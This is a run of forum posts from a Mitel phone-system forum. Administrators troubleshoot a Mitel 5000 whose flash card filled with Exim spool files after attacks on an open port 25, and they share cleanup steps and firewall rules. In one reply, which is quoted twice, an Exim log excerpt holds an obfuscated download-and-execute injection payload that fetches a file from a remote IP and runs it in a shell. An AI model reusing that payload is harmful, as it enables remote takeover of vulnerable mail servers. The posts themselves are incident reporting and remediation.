Messages

1

MiVoice Office 250/Mitel 5000 / MiVoice Office 250 IP Phone License Category B question

« on: July 25, 2023, 05:01:31 PM »

Hello All,

Does anyone in the US have access to MiVoice Office 250 IP Phone License Category B Manufacturer part number:840.0414?

There is a legacy customer who requires 20 licenses.

I would appreciate any recommendations or advice you may have.

2

MiVoice Office 250/Mitel 5000 / Re: How to delete email logs through command (exim hacked)

« on: August 09, 2019, 11:13:28 PM »

jluisr,

That is not something that is known by certified technicians as that definitely falls into the category of call Mitel. It looks as though your spooler is holding onto mail and this happens with Unified Messaging on some versions of the system. Usually you call into Mitel and get them in and they fix it in a few minutes by clearing out the spool.

I am not so sure that the version of Exim run on the MiVO-250 falls into the versions that are vulnerable either, 4.87 to 4.91, as Mitel doesn't keep up with the latest and greatest on that.

Sorry,

TE

Thanks, but I just found an alternative solution, I bought CF card reader, I connect to my laptop, (linux reader partition from Windows as (Eassos) then I deleted all the files in /var/spool/exim/msglog/
You will have a couples files with weird names...inside something like this...

Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
2019-06-09 23:19:05 routing failed for ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyiln\x20\x26\x26\x20sh\x20


You can delete everthing inside this folder, Also made sure that the port 25 it's block from outside.

I hope this help.....

jluisr,

Is there any specific CF reader needed? Or any generic one will do?

Also you can block port 25 via the internal firewall on the webpage/diagnostics/firewall of the system. Be careful to not lock yourself out by accident. Make your first rule to allow all on the local network, Second rule your static IP From your office and then last the block 25 tcp for all.

After typing the first rule with seq 1 it will automatically become rule 3. rule 1/2 are auto generated by the system.

ex.

1       192.168.1.0    255.255.255.0     blank  blank  all   allow
4       24.222.2.222  255.255.255.128   blank blank all   allow
5        blank               0.0.0.0                25     25      tcp    block

Travis,
I bought this one at microcenter store
https://www.microcenter.com/product/473039/usb-30-dual-slot-sd-uhs-ii---cf-memory-card-reader?ob=1
But I’m sure that you can use any CF reader!.

The system it’s now whitelisted from outside!..
BTW thanks


Sent from my iPhone using Tapatalk

3

MiVoice Office 250/Mitel 5000 / Re: How to delete email logs through command (exim hacked)

« on: August 01, 2019, 08:52:51 AM »

I know that the main problem was the port forwarded to the PBX (all port including 25 was open to the world, but I had a 3 systems that they crashed the same day. After the exit vulnerability was discovered a lot ip from the internet are looking for port 25 exim running old versions...
Now they are working, all the logs are showing one ip from French...
My systems went up after I manually deleted the files from msglog.
Every device public on the internet wide open will get the same issue CF card full VM 28 alarm...
For me basically it’s a bug because if for some reason the port 25 it’s open we can crash any system, I know that we need to have best practices like vlan...etc, outside on the internet we have a lot systems wide open and nothing happen. I believe that mitel need to give a least option to delete this logs, but the best way is they need put a limit on this folders.....
Thanks.


Sent from my iPhone using Tapatalk

4

MiVoice Office 250/Mitel 5000 / Re: How to delete email logs through command (exim hacked)

« on: July 31, 2019, 11:49:53 AM »

jluisr,

That is not something that is known by certified technicians as that definitely falls into the category of call Mitel. It looks as though your spooler is holding onto mail and this happens with Unified Messaging on some versions of the system. Usually you call into Mitel and get them in and they fix it in a few minutes by clearing out the spool.

I am not so sure that the version of Exim run on the MiVO-250 falls into the versions that are vulnerable either, 4.87 to 4.91, as Mitel doesn't keep up with the latest and greatest on that.

Sorry,

TE

Thanks, but I just found an alternative solution, I bought CF card reader, I connect to my laptop, (linux reader partition from Windows as (Eassos) then I deleted all the files in /var/spool/exim/msglog/
You will have a couples files with weird names...inside something like this...

Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
2019-06-09 23:19:05 routing failed for ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyiln\x20\x26\x26\x20sh\x20


You can delete everthing inside this folder, Also made sure that the port 25 it's block from outside.

I hope this help.....

5

MiVoice Office 250/Mitel 5000 / Re: CF card full

« on: July 31, 2019, 08:53:34 AM »

Maybe you got the same reason that my....
I just posted righ here

http://mitelforums.com/forum/index.php?topic=12310.0


I you got way to fix let me know, thanks..

6

MiVoice Office 250/Mitel 5000 / How to delete email logs through command (exim hacked)

« on: July 31, 2019, 08:51:01 AM »

I have 1 mitel 5000 1gb flash, the system crash beacuse I don't have space inside flash (it's full). When I took a look I saw running on cli (logmgt status I got this)..

rofsutil: 5K Compact Flash: logfile status
System Log Files:         37M
CP Backup Files:          37M
CP Freeze Files:          37M
CP Database Backup:      1.4M
CP Log Files:            1.3M
Email Spool Files:       623M ***************************************
Voicemail Recordings:    376K

.For some reason the IT guy leave the port 25 opened and I look like adter the exim vulnerability was found they try to hack...From outside the port it's now blocked...but now....

https://www.zdnet.com/article/new-rce-vulnerability-impacts-nearly-half-of-the-internets-email-servers/


I appreciated any help in how to use this command (logmgt) Thanks.